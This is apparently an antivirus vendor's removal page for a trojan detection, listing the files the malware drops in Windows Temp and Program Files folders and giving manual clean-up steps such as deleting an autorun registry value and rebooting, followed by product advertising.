C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\6pm.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_close.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowDown.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\radio.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\browser.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\uninst_complete.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2DF3.tmp (88249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\inst_successfully.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-de.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\menuButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\Ashford.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\install.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowUp.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_alpha.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\box_check.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\popup.html (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\button_setup.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\mainBk.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollBar.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\gnc.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\wtl.exe.manifest (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\now_start.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTSetup.exe (30344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\return.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo_text.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe (25824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\srollBk.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh6104.tmp (88249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-R6MIP.tmp\webfriend2.tmp (1429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T7QO7T4H.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XSZEUUBG.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026566\webfriend2.exe (144837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026442\20002.exe (143808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe (259462 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026383\20002.exe (143808 bytes)
%Program Files%\Leawo Commandision\is-KG2HA.tmp (16158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-9H2MC.tmp\_isetup\_iscrypt.dll (6 bytes)
%Program Files%\Leawo Commandision\is-NV2MC.tmp (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\swapfile.ini (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026416\popnew.xml (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp1660aaaaaa (173 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp3536aaaaaa (173 bytes)
%Program Files%\Leawo Commandision\Leawo Commandision.dll (146 bytes)
%Program Files%\Leawo Commandision\954872365 (56 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msiql" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe /RUNNING"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Trojan.Heur.JP.bEWa4g4RCbi_fb00675568

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Trojan.Heur.JP.bEWa4g4RCbi_fb00675568

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet